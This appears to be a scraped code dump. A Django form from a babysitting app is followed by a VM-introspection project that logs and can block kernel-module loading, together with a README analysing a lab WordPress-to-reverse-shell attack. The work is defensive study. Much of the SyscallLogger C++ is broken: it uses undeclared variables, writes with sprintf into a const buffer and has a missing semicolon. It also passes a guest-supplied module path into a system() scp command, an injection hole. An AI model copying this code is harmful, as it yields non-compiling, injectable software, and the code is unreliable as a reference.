"repo_name": "carlcastello/BabySittingApp", "src_encoding": "UTF-8", "text": "from django.forms import Form, CharField, EmailField, TextInput\nfrom django.core.validators import MaxLengthValidator, MinLengthValidator, RegexValidator, EmailValidator\n\n\nclass UserCreationForm(Form):\n\n first_name = CharField(\n validators=[\n RegexValidator(regex=\"^[a-zA-Z]+$\", message=None),\n MinLengthValidator(5, message=None),\n MaxLengthValidator(100, message=None)\n ],\n widget=TextInput(\n attrs={\n \"type\": \"text\",\n \"class\": \"form-control\",\n \"pattern\": \"^[a-zA-Z]+$\",\n \"placeholder\": \"John\",\n \"maxlength\": 100,\n \"data-minlength\": 5,\n \"data-error\": \"\"\n }\n )\n )\n\n last_name = CharField(\n validators=[\n RegexValidator(regex=\"^[a-zA-Z]+$\", message=None),\n MinLengthValidator(2, message=None),\n MaxLengthValidator(30, message=None)\n ],\n widget=TextInput(\n attrs={\n \"type\": \"text\",\n \"class\": \"form-control\",\n \"pattern\": \"^[a-zA-Z]+$\",\n \"placeholder\": \"Smith\",\n \"maxlength\": 30,\n \"data-minlength\": 2,\n \"data-error\": \"\"\n }\n )\n )\n\n email = EmailField(\n validators=[\n EmailValidator(message=None)\n ],\n widget=TextInput(\n attrs={\n \"type\": \"email\",\n \"class\": \"form-control\",\n \"placeholder\": \"[email protected]\",\n \"maxlength\": 100,\n \"data-minlength\": 2,\n \"data-error\": \"\"\n }\n )\n )\n\n contact_number = CharField(\n validators=[\n RegexValidator(regex=\"^\\+?1?\\d{9,15}$\", message=None),\n MinLengthValidator(10, message=None),\n MaxLengthValidator(100, message=None)\n ],\n widget=TextInput(\n attrs={\n \"type\": \"text\",\n \"class\": \"form-control\",\n \"placeholder\": \"123 456 7890\",\n \"maxlength\": 20,\n \"data-minlength\": 10,\n \"data-error\": \"\"\n }\n )\n )\n\n address = CharField(\n validators=[\n MinLengthValidator(5, message=None),\n MaxLengthValidator(100, message=None)\n ],\n widget=TextInput(\n attrs={\n \"type\": \"text\",\n \"class\": \"form-control\",\n \"placeholder\": \"123 45th Street\",\n \"maxlength\": 100,\n \"data-minlength\": 2,\n \"data-error\": \"\"\n }\n )\n )\n\n password = CharField(\n validators=[\n MinLengthValidator(5, message=None),\n MaxLengthValidator(100, message=None)\n ],\n widget=TextInput(\n attrs={\n \"type\": \"password\",\n \"class\": \"form-control\",\n \"placeholder\": \"Password\",\n \"maxlength\": 100,\n \"data-minlength\": 2,\n \"data-error\": \"\"\n }\n )\n )\n\n confirm_password = CharField(\n validators=[\n MinLengthValidator(5, message=None),\n MaxLengthValidator(100, message=None)\n ],\n widget=TextInput(\n attrs={\n \"type\": \"password\",\n \"class\": \"form-control\",\n \"placeholder\": \"Password\",\n \"maxlength\": 100,\n \"data-minlength\": 2,\n \"data-match\": \"#id_password\",\n \"data-error\": \"\"\n }\n )\n )\n\n class Meta:\n fields = (\n \"first_name\",\n \"last_name\",\n \"email\",\n \"contact_number\",\n \"address\",\n \"password\",\n \"confirm_password\"\n )\n" }, { "alpha_fraction": 0.7941176295280457, "alphanum_fraction": 0.7941176295280457, "avg_line_length": 26.200000762939453, "blob_id": "e6a12ce491de18345dddd6e5575437fb2f34a0af", "content_id": "031cf58bb386a0abad11983f89d6d23a651dd268", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 136, "license_type": "no_license", "max_line_length": 54, "num_lines": 5, "path": "/customer_portal_project/customer_portal/views/ProfilePortal.py", "repo_name": "carlcastello/BabySittingApp", "src_encoding": "UTF-8", "text": "\nfrom django.views.generic import TemplateView\n\n\nclass ProfileView(TemplateView):\n template_name = \"profile_portal/profile_view.html\"" }, { "alpha_fraction": 0.7235293984413147, "alphanum_fraction": 0.7235293984413147, "avg_line_length": 38.30769348144531, "blob_id": "8a5679efe1b94715d6ef232b8e8c887a4ad86d0c", "content_id": "df3666fb3b33c2709b069961d7e6bc85578dbb9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 510, "license_type": "no_license", "max_line_length": 87, "num_lines": 13, "path": "/customer_portal_project/customer_portal/urls.py", "repo_name": "carlcastello/BabySittingApp", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\n\nfrom customer_portal.views.CustomerPortal import HomeView, ServicesView\nfrom customer_portal.views.Authentication import SignUp\nfrom customer_portal.views.ProfilePortal import ProfileView\n\nurlpatterns = [\n url(r'^$', HomeView.as_view(), name='home'),\n url(r'^user/register$', SignUp.as_view(), name='register'),\n url(r'^user/profile/(?P<profile_id>\\w+)+$', ProfileView.as_view(), name='profile'),\n url(r'^user/services', ServicesView.as_view(), name='services')\n\n]" } ]
4
SagaBegins/vmwatch
https://github.com/SagaBegins/vmwatch
f7869015e34ff754f27556e809ad628b32581715
e6ac943d7d112cce15931462b799247cd8fa0803
2f021daf481b325706142adb3c06e3471f24d629
refs/heads/main
2023-07-11T20:40:55.858779
2021-08-28T14:35:43
2021-08-28T14:35:43
399,683,161
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.6141242980957031, "alphanum_fraction": 0.6230508685112, "avg_line_length": 27.637540817260742, "blob_id": "24f0432c41039fc7927ef2145540293eb7795bd3", "content_id": "80d8bf910912456b76b289f622f01c18dff08cf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 8850, "license_type": "no_license", "max_line_length": 144, "num_lines": 309, "path": "/libvmtrace/apps/plugins/SyscallLogger.cpp", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "#include <plugins/SyscallLogger.hpp>\n#include <sys/LinuxVM.hpp>\n#include <string.h>\n#include <fstream>\n#include <time.h>\n#include <ctime>\n#include <cmath>\n#include <unistd.h>\n\nusing namespace rapidjson;\nusing std::chrono::duration_cast;\nusing std::chrono::milliseconds;\nusing std::chrono::seconds;\nusing std::chrono::system_clock;\n\n\nnamespace libvmtrace\n{\n\tconst std::string SyscallLogger::ExecuteCommand(const std::string command, \n\t\t\t\t\tconst std::vector<std::string> params,\n\t\t\t\t\tconst std::string command_id,\n\t\t\t\t\tconst std::string vm_id)\n\t{\n\t\tif(vm_id != _vm_id)\n\t\t{\n\t\t\treturn \"\";\n\t\t}\n\t\n\t\tif(command == \"Trace\" && params.size() > 0)\n\t\t{\n\t\t\tfor(auto x : params)\n\t\t\t{\n\t\t\t\tint nr = atoi(x.c_str());\n\t\t\t\tif (_events[nr] == NULL)\n\t\t\t\t{\n\t\t\t\t\tif(nr == 59) // exec does not return\n\t\t\t\t\t{\t\n\t\t\t\t\t\t_events[nr] = new SyscallEvent(nr, *this, false, false, _json);\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\t_events[nr] = new SyscallEvent(nr, *this, _return_value, false, _json);\n\t\t\t\t\t}\n\n\t\t\t\t\t_os.RegisterSyscall(*_events[nr]);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse if(command == \"Untrace\" && params.size() > 0)\n\t\t{\n\t\t\tfor(auto x : params)\n\t\t\t{\n\t\t\t\tint nr = atoi(x.c_str());\n\t\t\t\tif(_events[nr] != nullptr)\n\t\t\t\t{\n\t\t\t\t\t_os.DeRegisterSyscall(*_events[nr]);\n\t\t\t\t\tdelete _events[nr];\n\t\t\t\t\t_events[nr] = nullptr;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\treturn \"\";\n\t}\n\n\tbool SyscallLogger::callback(const Event* ev, void* data)\n\t{\n\t\tconst SyscallEvent* sev = dynamic_cast<const SyscallEvent*>(ev);\n\t\tLinuxVM *lvm = dynamic_cast<LinuxVM*> (&_os);\n\t\t\n\t\tif(!sev)\n\t\t{\n\t\t\treturn false;\n\t\t}\n\t\tSyscallBasic* s = (SyscallBasic*)data;\n\n\n\t\tstd::string json = s->ToJson();\n\n\t\tDocument document;\n\t\tdocument.Parse(json.c_str());\n\t\tDocument::AllocatorType& allocator = document.GetAllocator();\n\t\tconst int BUFFER_LEN = 10000;\n\n\t\ttry\n\t\t{\n\t\t\tconst Process& p = _pc.GetProcessFromDtb(s->GetDtb());\n\t\t\tstd::string name = p.GetName();\n\t\t\tstd::string pwd = p.GetPwd();\n\n\t\t\tdocument.AddMember(\"proc_name\", Value(name.c_str(), allocator).Move(), allocator);\n\t\t\tdocument.AddMember(\"uid\", p.GetUid(), allocator);\n\n\t\t\tdocument.AddMember(\"pwd\", Value(pwd.c_str(), allocator).Move(), allocator);\n\t\t}\n\t\tcatch(...)\n\t\t{\n\t\t\tdocument.AddMember(\"proc_name\", \"ERR\", allocator);\n\t\t\tdocument.AddMember(\"uid\", 0, allocator);\n\t\t\tdocument.AddMember(\"pwd\", \"ERR\", allocator);\n\t\t}\n\t\t\n\t\tconst std::string USR_MODULE = \"/usr/lib/modules/\"; // len 17\n\t\tconst std::string LIB_MODULE = \"/lib/modules/\"; // len 13\n\n\t\tif(s->GetNr() == 1)\n\t\t{\n\t\t\tProcess p = lvm->GetCurrentProcess(s->GetRegisters().gs_base);\n\t\t\t// GetOpenFiles extracts file names from task_struct; the second\n\t\t\t// parameter is a filter that selects a specific file descriptor\n\t\t\tstd::vector<OpenFile> ofv = lvm->GetOpenFiles(p, s->GetParameter(0));\n\t\t\tif(ofv.size()>0) \n\t\t\t{ \n\t\t\t\tstd::string path = ofv[0].path; \n\t\t\t\tdocument.AddMember(\"fileName\",StringRef(path.c_str()),allocator);\n\t\t\t}\n\t\t}\n\t\telse if(s->GetNr() == 2)\n\t\t{\n\t\t\tstd::string path = \"EMPTY PATH\";\n\t\t\tstd::string pwd = \"EMPTY PWD\";\n\t\t\tif (document.HasMember(\"path\"))\n\t\t\t path = document[\"path\"].GetString();\n\t\t\tif (document.HasMember(\"pwd\"))\n\t\t\t pwd = document[\"pwd\"].GetString();\n\n\t\t\tstd::string fullPath = path;\n\t\t\tif(!path.empty())\n\t\t\t{\n\t\t\t\tstd::string tmp = path.substr(0,1);\n\t\t\t\tif(tmp.compare(\"/\") != 0)\n\t\t\t\t{\n\t\t\t\t\tfullPath = pwd+\"/\"+path;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tValue sa;\n\t\t\tsa = StringRef(fullPath.c_str());\n\t\t\tdocument.AddMember(\"fullPath\", sa, allocator);\n\t\t}\n\t\telse if(s->GetNr() == 175)\n\t\t{ \n\t\t\t// When process uses init_module(void *image, unsigned long len, char *param)\n\t\t\t// it is paused and when the prevent flag is true the address is changed to prevent \n\t\t\t// it being called. The image of the module is dumped in /root/modwatch/dumps/dump-[time-stamp].bin \n\n\t\t\tstd::cout << std::endl; \n\t\t\tProcess p = lvm->GetCurrentProcess(s->GetRegisters().gs_base);\t\t\n\t\t\t\n\t\t\tauto _sm = lvm->GetSystemMonitor();\n\t\t\tconst auto vm = _sm->Lock();\n\n\t\t\tunsigned long file_length = s->GetParameter(1);\n\t\t\tconst addr_t param_pointer = s->GetParameter(2);\n\t\t\tchar param[BUFFER_LEN];\n\t\t\t\n\t\t\tchar* val = vmi_read_str_va(vm, param_pointer, p.GetPid());\n\t\t\tsnprintf(param, BUFFER_LEN,\"%s\", val);\n\n\t\t\tdocument.AddMember(\"param\", StringRef(param), allocator);\n\t\t\tdocument.AddMember(\"fileLength\", file_length, allocator);\n\t\t\t\n\t\t\tif(_prevent) \n\t\t\t{\n\t\t\t\taddr_t addr = 0;\n\n\t\t\t\t#ifdef INTROSPECT_PTREGS\n\t\t\t\t\t// Use LibVMI to write RSI in ptreg data structure\n\t\t\t\t\taddr_t offset = 0;\n\t\t\t\t\tvmi_get_kernel_struct_offset(vmi, \"pt_regs\", \"si\", &offset);\n\t\t\t\t\taddr_t rsi = s->GetRegisters().rdi + offset;\n\t\t\t\t\tint st = vmi_write_64_va(vmi, rsi, 0, &addr);\n\t\t\t\t#else\n\t\t\t\t\t// Use LibVMI to set VCPU register RSI (2nd argument) to 0\n\t\t\t\t\tint st = vmi_set_vcpureg(vmi, addr, RSI, 0);\n\t\t\t\t#endif\n\t\t\t}\n\n\t\t\tif(file_length) \n\t\t\t{\n\t\t\t\tauto ts = duration_cast<milliseconds>(system_clock::now().time_since_epoch()).count();\n\t\t\t\tchar image_name[1000];\n\t\t\t\tsprintf(image_name, \"/root/modwatch/dumps/dump-%llu.bin\", ts);\n\n\t\t\t\tstd::ofstream outdata_image;\n\t\t\t\toutdata_image.open(image_name, std::ios::binary);\n\t\t\t\t\n\t\t\t\tunsigned long long times_to_loop = file_length/BUFFER_LEN; \t\t\t\t\t\n\t\t\t\tuint64_t* data;\n\t\t\t\tchar* bin_data;\n\t\t\t\tconst addr_t image_addr = s->GetParameter(0);\n\t\t\t\taddr_t next_addr = image_addr;\n\n\t\t\t\t// Begin writing dump\n\t\t\t\tfor(unsigned long long i = 0; i < times_to_loop; ++i) \n\t\t\t\t{\n\t\t\t\t\tdata = new uint64_t[BUFFER_LEN];\n\n\t\t\t\t\t// Reading data of BUFFER_LEN into data\n\t\t\t\t\tvmi_read_va(vmi, next_addr, p.GetPid(), BUFFER_LEN, data, NULL);\n\t\t\t\t\t\n\t\t\t\t\tbin_data = static_cast<char*>(static_cast<void*>(data));\n\n\t\t\t\t\toutdata_image.write(bin_data, BUFFER_LEN);\n\t\t\t\t\toutdata_image.flush();\n\n\t\t\t\t\tnext_addr += BUFFER_LEN;\n\t\t\t\t\tdelete[] data;\n\t\t\t\t}\n\n\t\t\t\t// Getting the remainder\n\t\t\t\tunsigned long long remaining = file_length%BUFFER_LEN;\n\t\t\t\tdata = new uint64_t[remaining];\n\t\t\t\tvmi_read_va(vmi, next_addr, p.GetPid(), remaining, data, NULL);\n\t\t\t\t\n\t\t\t\tbin_data = static_cast<char*>(static_cast<void*>(data));\n\t\t\t\toutdata_image.write(bin_data, remaining);\n\n\t\t\t\toutdata_image.flush();\n\t\t\t\toutdata_image.close();\t\n\t\t\t\t// End writing dump\t\t\t\n\t\t\t}\n\t\t\t\n\t\t\t_sm->Unlock();\n\t\t}\n\t\telse if(s->GetNr() == 313)\n\t\t{\n\t\t\t// When process uses finit_module(int fd, char *param, int flags)\n\t\t\t// it is paused and when the prevent flag is true and the module file is not in the usual directories,\n\t\t\t// the address is changed to prevent it being called. \n\t\t\t// The image of the module is dumped in /root/modwatch/dumps/dump-[time-stamp].bin \n\n\t\t\tstd::cout << std::endl;\n\t\t\tProcess pr= lvm->GetCurrentProcess(s->GetRegisters().gs_base);\n\t\t\tstd::vector<OpenFile> ofv = lvm->GetOpenFiles(pr, s->GetParameter(0));\n\t\t\t\n\t\t\tint fd = s->GetParameter(0);\n\t\t\tint flags = s->GetParameter(2);\n\n\t\t\tdocument.AddMember(\"fd\", fd, allocator);\n\t\t\tdocument.AddMember(\"flags\", flags, allocator);\n\t\t\t\n\t\t\tif(ofv.size()>0) \n\t\t\t{ \t\n\t\t\t\tstd::string path = ofv[0].path; \n\t\t\t\tchar path_buffer[BUFFER_LEN]; \n\t\t\t\tsprintf(p, \"%s\", path.c_str()); // Helps prevent weird unicode from being printed\n\n\t\t\t\tdocument.AddMember(\"filename\", StringRef(path_buffer), allocator);\n\t\t\t\t\n\t\t\t\tauto _sm = lvm->GetSystemMonitor();\n\t\t\t\tconst auto vmi = _sm->Lock();\t\n\t\t\t\t\n\t\t\t\tchar param_buffer[BUFFER_LEN];\n\t\t\t\taddr_t param_addr = s->GetParameter(1);\n\t\t\t\tchar *params = vmi_read_str_va(vmi, param_addr, pr.GetPid());\n\t\n\t\t\t\tif (params != NULL) \n\t\t\t\t{\n\t\t\t\t\tsnprintf(param_buffer, BUFFER_LEN,\"%s\", params);\n\t\t\t\t\tdocument.AddMember(\"param\", StringRef(param_buffer.c_str()), allocator);\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tdelete params;\n\t\t\t\t\n\t\t\t\tif(_prevent && !(USR_MODULE.compare(path.substr(0, strlen(USR_MODULE))) == 0 || LIB_MODULE.compare(path.substr(0, str(LIB_MODULE))) == 0) ) \n\t\t\t\t{\n\t\t\t\t\tauto _sm = lvm->GetSystemMonitor(); \n\t\t\t\t\tconst auto vmi = _sm->Lock();\n\t\t\t\t\taddr_t addr = 0;\n\t\t\t\t\t#ifdef INTROSPECT_PTREGS\n\t\t\t\t\t\t// Use LibVMI to write RSI in ptreg data structure\n\t\t\t\t\t\taddr_t offset = 0;\n\t\t\t\t\t\tvmi_get_kernel_struct_offset(vmi, \"pt_regs\", \"si\", &offset);\n\t\t\t\t\t\taddr_t rsi = s->GetRegisters().rdi + offset;\n\n\t\t\t\t\t\tint st = vmi_write_64_va(vmi, rsi, 0, &addr);\n\t\t\t\t\t#else\n\t\t\t\t\t\t// Use LibVMI to set VCPU register RSI (2nd argument) to 0\n\t\t\t\t\t\tint st = vmi_set_vcpureg(vmi, addr, RSI, 0);\n\t\t\t\t\t#endif\n\t\t\t\t\t_sm->Unlock();\n\t\t\t\t}\n\n\t\t\t\tauto ts = duration_cast<milliseconds>(system_clock::now().time_since_epoch()).count();\n\t\t\t\tchar dump_path[BUFFER_LEN];\n\t\t\t\tsprintf(dump_path, \"/root/modwatch/dumps/dump-%llu.bin\", ts);\n\t\t\t\tconst char SCP_COMMAND[BUFFER_LEN];\n\t\t\t\tsprintf(SCP_COMMAND, SCP_MODULE_FILE_FORMAT, \"scp 192.168.13.245:%s %s\", path_buffer, dump_path)\n\t\t\t\tsystem(SCP_COMMAND);\n\t\t\t}\n\t\t}\n\t// #endif\n\n\t\tdocument.RemoveMember(\"dtb\");\n\t\tdocument.RemoveMember(\"rsp\");\n\t\tdocument.RemoveMember(\"rip\");\n\t\tdocument.RemoveMember(\"syscall_name\");\n\t\tdocument.RemoveMember(\"logtype\");\n\t\t\n\t\tStringBuffer strbuf;\n\t\tWriter<StringBuffer> writer(strbuf);\n\t\tdocument.Accept(writer);\n\n\t\t_log.log(_vm_id, _log_name, strbuf.GetString());\n\n\t\treturn false;\n\t}\n}\n\n" }, { "alpha_fraction": 0.6574074029922485, "alphanum_fraction": 0.7222222089767456, "avg_line_length": 28.454545974731445, "blob_id": "000e7e2fa4b8e26661b233d26fcf763f09a38acf", "content_id": "dfe5d76e9b104dd703c8b006dcc61eebb1c8636b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 324, "license_type": "no_license", "max_line_length": 64, "num_lines": 11, "path": "/scripts/server.py", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "import socket\n\n#socket.SOCK_STREAM indicates TCP\nserversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserversocket.bind((\"192.168.13.245\", 12345))\nwhile(True):\n serversocket.listen(1)\n\n ( clientsocket, address) = serversocket.accept()\n msg = clientsocket.recv(1024)\n print (\"server recieved \"+msg)\n" }, { "alpha_fraction": 0.6484975814819336, "alphanum_fraction": 0.6603773832321167, "avg_line_length": 19.44285774230957, "blob_id": "73b117527a67b4c4b99060f4f7e428b9f4457a6a", "content_id": "edb7dddd99f1309c285eccf805b9bb3c0c8d7a7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1431, "license_type": "no_license", "max_line_length": 70, "num_lines": 70, "path": "/libvmtrace/csec.cpp", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "#include <libvmi/libvmi.h>\n#include <libvmtrace.hpp>\n#include <sys/LinuxVM.hpp>\n#include <plugins/Plugins.hpp>\n\nusing namespace libvmtrace;\nusing namespace libvmtrace::util;\n\nstd::shared_ptr<SystemMonitor> _sm;\nstd::shared_ptr<LinuxVM> _linux;\n\nstatic bool interrupted = false;\nstatic void close_handler(int sig)\n{\n\tif (sig == SIGSEGV) \n\t{\n\t\t_linux = nullptr;\n\t\t_sm = nullptr;\n\t}\n\n\tinterrupted = true;\n}\n\nint main(int argc, char* argv[]) \n{\n\tbool prevent = false;\n\n\tif (argc == 1)\n\t{\n\t\tstd::cout << argv[0] << \" <vmname>\" << \" [1]\" << std::endl;\n\t\treturn -1;\n\t}\n\n\tif (argc == 3)\n\t\tprevent = atoi(argv[2]);\n\n\tstd::string vm_id = argv[1];\n\n\tstruct sigaction act;\n\tact.sa_handler = close_handler;\n\tact.sa_flags = 0;\n\tsigemptyset(&act.sa_mask);\n\tsigaction(SIGHUP, &act, NULL);\n\tsigaction(SIGTERM, &act, NULL);\n\tsigaction(SIGINT, &act, NULL);\n\tsigaction(SIGALRM, &act, NULL);\n\tsigaction(SIGPIPE, &act, NULL);\n\n\t_sm = std::make_shared<SystemMonitor>(vm_id, true);\n\t_linux = std::make_shared<LinuxVM>(_sm);\n\tProcessCache pc(*_linux);\n\n\tLog* log = new Log();\n\tlog->RegisterLogger(new StdoutLogger(false));\n\n\tSyscallLogger sl(vm_id, *_linux, pc, *log, prevent, true, false);\n\tController c;\n\tc.RegisterPlugin(sl);\n\n\tstd::vector<std::string> calls_to_log;\n\tcalls_to_log.push_back(\"175\");\n\tcalls_to_log.push_back(\"313\");\n\t\n\tc.ExecuteCommand(\"SyscallLogger\", \"Trace\", calls_to_log, \"0\", vm_id);\n\n\twhile(!interrupted) \n\t\tsleep(1);\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6348791718482971, "alphanum_fraction": 0.6394513249397278, "avg_line_length": 23.661291122436523, "blob_id": "33bc3fb570f7a7bc7c48790a465a30ba59317bf2", "content_id": "8219189a4cc6df05cc999fc55257801329ddcc92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1531, "license_type": "no_license", "max_line_length": 134, "num_lines": 62, "path": "/libvmtrace/apps/plugins/SyscallLogger.hpp", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "\n#ifndef __SYSCALL_LOGGER__\n#define __SYSCALL_LOGGER__\n\n#include <libvmi/libvmi.h>\n#include <libvmtrace.hpp>\n\nnamespace libvmtrace\n{\n\tclass SyscallLogger : public util::Plugin, public EventListener\n\t{\n\t\tpublic:\n\t\t\tSyscallLogger(std::string vm_id, OperatingSystem& os, ProcessCache& pc, util::Log& log, bool prevent)\n\t\t\t\t: SyscallLogger(vm_id, os, pc, log, prevent, true, true) { };\n\n\t\t\tSyscallLogger(std::string vm_id, OperatingSystem& os, ProcessCache& pc, util::Log& log, bool prevent, bool json, bool return_value)\n\t\t\t\t: _vm_id(vm_id), _os(os), _pc(pc), _log(log), _prevent(prevent), _json(json), _return_value(return_value)\n\t\t\t{\n\t\t\t\t_commands.push_back(\"Trace\");\n\t\t\t\t_commands.push_back(\"Untrace\");\n\n\t\t\t\tfor (int i = 0; i < 600; i++)\n\t\t\t\t\t_events[i] = nullptr;\n\n\t\t\t\t_log_name = \"sys_syscall_\"+vm_id;\n\t\t\t}\n\n\t\t\tconst std::string ExecuteCommand(const std::string command, const std::vector<std::string> params,\n\t\t\t\t\t\t\t\tconst std::string command_id, const std::string vm_id);\n\n\t\t\tconst std::string GetName() const\n\t\t\t{\n\t\t\t\treturn \"SyscallLogger\";\n\t\t\t}\n\n\t\t\tconst std::vector<std::string> GetListCommands() const\n\t\t\t{\n\t\t\t\treturn _commands;\n\t\t\t}\n\n\t\t\tconst void Stop()\n\t\t\t{\n\t\t\t\tstd::cout << \"STOP\" << std::endl;\n\t\t\t}\n\n\t\t\tbool callback(const Event* ev, void* data);\n\n\t\tprivate:\n\t\t\tstd::string _vm_id;\n\t\t\tOperatingSystem& _os;\n\t\t\tSyscallEvent* _events[600];\n\t\t\tProcessCache& _pc;\n\t\t\tutil::Log& _log;\n\t\t\tbool _json;\n\t\t\tbool _return_value;\n\t\t\tbool _prevent;\n\n\t\t\tstd::vector<std::string> _commands;\n\t\t\tstd::string _log_name;\n\t};\n}\n\n#endif\n\n" }, { "alpha_fraction": 0.49725252389907837, "alphanum_fraction": 0.5992100834846497, "avg_line_length": 68.11573028564453, "blob_id": "6940409b99f2f8b308340ebff0035c9ab6d4cd93", "content_id": "0ce5686225851c343a7798973f17539a6a05ade0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 23294, "license_type": "no_license", "max_line_length": 498, "num_lines": 337, "path": "/README.md", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "Vidya Sagar @sagabegins \nMohamed Anis @AnisBoudj \n\n## Section 1: Implement a volatility3 plugin for network connections\n\nA volitility plugin named **findsocket.py** was implemented to find the details of network connections on the machine being monitored. The connection information is collected from the `__sk_common` struct which is referenced inside `sk` struct that can be obtained by following the instructions in the project task document. Since `__sk_common` cannot be directly obtained by calling it normally any other member of an object, `__getattr__` function was used to get the object from the sk struct. \nThere were some issues when trying to obtaining the file descriptors of some of the tasks. This issue was relsolved by using a utility function provided by volatility which obtains all the file discriptors of used by the process. \nMore information about the plugin and dependency is listed under [code files](#code-files) section.\n\n## Section 2: Malware detection using VMI with volatility\n### a) Implement an analysis tool\nWe implemented a plugin **watcher.py** which yields processes and loaded kernel modules in real time.\nIt requires the **findsocket.py** from Section one, **lsmod** and **pslist** plugins. \n\n- At time 0 :\nThe code creates 3 sets of : the network connections, running processes and kernel modules.\n- At t seconds after first capture :\nWe get the running process and we check if they exist in the previous processes set, (same for kernel modules and network sockets)\nWe also used some helper functions to process the data and store it in lists.\n- At every iteration the memory layer and primary layer are reloaded.\n\n### b) Attack analysis\n\nWhen the attack is initiated by `touch /attack/192.168.13.245`, the attack vm does the following:\n\n<figure align = \"center\">\n <img src=\"screenshots/attack_begins.PNG\" style=\"width:70%\">\n <figcaption align = \"center\"><b>Fig.1 - Attack 1</b></figcaption>\n</figure>\n\n\n- Connects to the target vm's wordpress website. (As seen in Fig. 1)\n- Probably logs in to the site as a root user, since the user name and password is generic it doesn't take long. (As seen in Fig. 1 unix connection of sql)\n\n<figure align = \"center\">\n <img src=\"screenshots/attack_2.PNG\" style=\"width:70%\">\n <figcaption align = \"center\"><b>Fig.2 - Attack 2</b></figcaption>\n</figure>\n\n- Then it resumes the connection to the target vm's wordpress site, after which it make the target vm connect to the attack vm's port 4444, which is usually used by metasploit. But could also be some other malware. (As seen in Fig 2.)\n\n<figure align = \"center\">\n <img src=\"screenshots/attack_3.PNG\" style=\"width:70%\">\n <figcaption align = \"center\"><b>Fig.3 - Attack 3</b></figcaption>\n</figure>\n\n<figure align = \"center\">\n <img src=\"screenshots/attack_4.PNG\" style=\"width:70%\">\n <figcaption align = \"center\"><b>Fig.4 - Attack 4</b></figcaption>\n</figure>\n\n- After establishing connection to port 4444. The malware triggers the target to connect to offical wordpress website's port 443, to probably download some plugin(Could be WPterm, but no additional plugins were found after the attack). (As seen in Fig.3 and Fig.4)\n\n<figure align = \"center\">\n <img src=\"screenshots/attack_5.PNG\" style=\"width:70%\">\n <figcaption align = \"center\"><b>Fig.5 - Attack 5</b></figcaption>\n</figure>\n\n<figure align = \"center\">\n <img src=\"screenshots/attack_end.PNG\" style=\"width:70%\">\n <figcaption align = \"center\"><b>Fig.6 - Attack 6</b></figcaption>\n</figure>\n\n- The attack vm has gained access to the executing shell commands and started a sh command to run python3 with sudo, which in turn connects to the attack vm at port 6667. (As seen in Fig.5 and Fig.6)\n\nSince the file __rtbot.py wasn't found in the target vm. It was either loaded from a kernal module inbetween log ticks or was downloaded from the official wordpress website. It is highly unlikely wordpress would host any malicious files or scripts so it must be the former.\n\n### c) Comparing VMI results and in-guest results\n\n- **Processes**: The open processes in the in-guest mode obtained via ps -aux, match the expected open processes obtained by going through the analysis logs.\n- **Modules**: Neither the analysis tool nor the in-guest mode picked up a change in the modules loaded.\n- **Connctions**: The python3 process seems to be hiding that it has open a connection which can be seen in the analysis logs. \n\nThe connection to port 6667 might have been unlinked from the python3 program at the end of the of the attack. The difference between the outputs obtained from the required command run in-guest are shown at the bottom. \n\n## Section 3 : Kernel root kit analysis and prevention\n### a) Use libvmtrace to log information\nWe could get information about syscalls that dynamically load kernel modules at runtime using the following :\n- The SyscallBasic class, which has a function `GetNr()` to return the number of the system call that has been triggered in the pvm.\n- LinuxVm class, which contains the following functions:\n `GetCurrentProcess()` : information about the process that made the syscall.\n `GetParameters(i)`: returns the argument i of the system call, by using their content we could get the parameters of both syscalls 175 and 313\n \n- We had to create a c program namely **sim_syscall175.c** calling system call 175 in order to catch it in our code because modprobe and insmode were not generating it.\n\n\n- Then we were able to display those details in the json document using the function document.AddMember().\nWriting the image data in a binary file has been achieved after defining some buffer ...\nwe get the address of the image using `getParameter(0)` (first argument in syscall 313).\nlooping through the image depending on the length of that data, in exactly _(file_length/BUFFER_LENGTH)_ iterations from that address and finally write the remainder length _(file_length%BUFFER_LENGTH)_.\n\n\n### b) Extract file content from fd\n\nAs of now this hasn't been implemented but it may be ready by presentation.\n\n### c) Prevent loading a module\n\nPreventing the system call from happening was made through modifying its parameters and nullify the registers.\nWe used LibVMI to set VCPU register RSI (2nd argument) to 0 : `vmi_set_vcpureg(vmi, addr, RSI, 0)`.\nUsing the boolean variable _prevent_ we could control the behaviour of our code, when it is set, the system call is blocked and cannot happen, else it's executed.\n\n---------------\n\n## Code Files\n\n### **`linux.findsocket.FindSocket`**: Mohamed Anis, Vidya Sagar \n\nThis can be placed in any of the plugins folder of volatility. It requires `linux.pslist.Pslist` and `linux.LinuxUtilities` to function. The `linux.pslist.Pslist` plugin provides a classmethod that lists all the tasks in the memory of the monitored system and the `linux.LinuxUtilities` contains a function that obtains information on file descriptors of all the listed tasks. It has two class methods `netstat` and `netstatstr`. \n\n`netstat` yields the 'pid', 'ppid', 'comm', 'protocol', 'laddr', 'faddr' and 'state'. If the protocol is unix it yields the 'full_path' instead of 'faddr'. \n`netstatstr` yields a formatted string with the above columns depending on the protocol sorted by protocol and port number of the 'laddr'. \n\n\n### **`linux.watcher.Monitor`**: Vidya Sagar\n\nThis like the `linux.findsocket.FindSocket` plugin can be placed in 